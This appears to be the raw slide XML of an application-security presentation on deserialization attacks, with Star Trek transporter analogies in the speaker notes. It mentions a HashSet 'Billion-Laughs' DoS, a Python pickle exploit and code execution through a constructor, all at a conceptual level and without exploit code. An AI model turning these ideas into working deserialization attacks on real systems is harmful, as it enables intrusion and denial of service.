          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16723906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Putting our object in some sort of container</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and sending the actual object.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14648952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We’re not sending</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the actual object, we’re sending a representation of the object.  This isn’t a perfect analogy because transporters emphasize that the same object is moved from one place to another, but it’s close for our purposes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31978472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Setting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> aside the obvious difference that the transporter stores patterns at the quantum level while the replicator stores them at a molecular level which all true fans understand (at least those who read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>wikipedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>).  The obvious difference is that the transporter is reproducing something that existed on the other end of the transmission, while a replicator is producing a new object from a stored pattern. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3487410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have to assume that in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the 24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> century, they’ve figured out how to perfectly authenticate transmissions and ensure their integrity in transit, because otherwise, your transporter is a wide open door, and before you know it, you’ve got Klingons on your ship.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7512828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class defines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a multiple sets of objects that reference each other.  When the server tries to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>deserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the object and establish the links, it ends up in an infinite loop, consuming all CPU allowed for that thread.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://www.owasp.org/index.php/Deserialization_of_untrusted_data</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Apparently</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a repost of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="sng" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>HashSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="sng" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> Billion-Laughs Style </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="sng" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="sng" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> example by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="sng" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Wouter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="sng" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="sng" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Coekaerts</a:t>
            </a:r>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4870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22046679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we’ve got this doorway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> right?  All we have to do is write a custom object that runs our evil code as part of the constructor and BOOM, the shells roll in.  Right?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14706288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Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Pickle Exploit essentially did.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>2011 – Nelson </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Elhage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>  https://blog.nelhage.com/2011/03/exploiting-pickle/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324908139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648420" y="2130425"/>
            <a:ext cx="6809780" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="D8A519"/>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648420" y="3886200"/>
            <a:ext cx="6123980" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">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9851882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46F7C92-B666-BE4A-87BA-E45BF689715D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/17/2016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E9C67AB-B614-C742-93A2-1DCA2D6D2270}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3034002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46F7C92-B666-BE4A-87BA-E45BF689715D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/17/2016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E9C67AB-B614-C742-93A2-1DCA2D6D2270}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3141234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14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
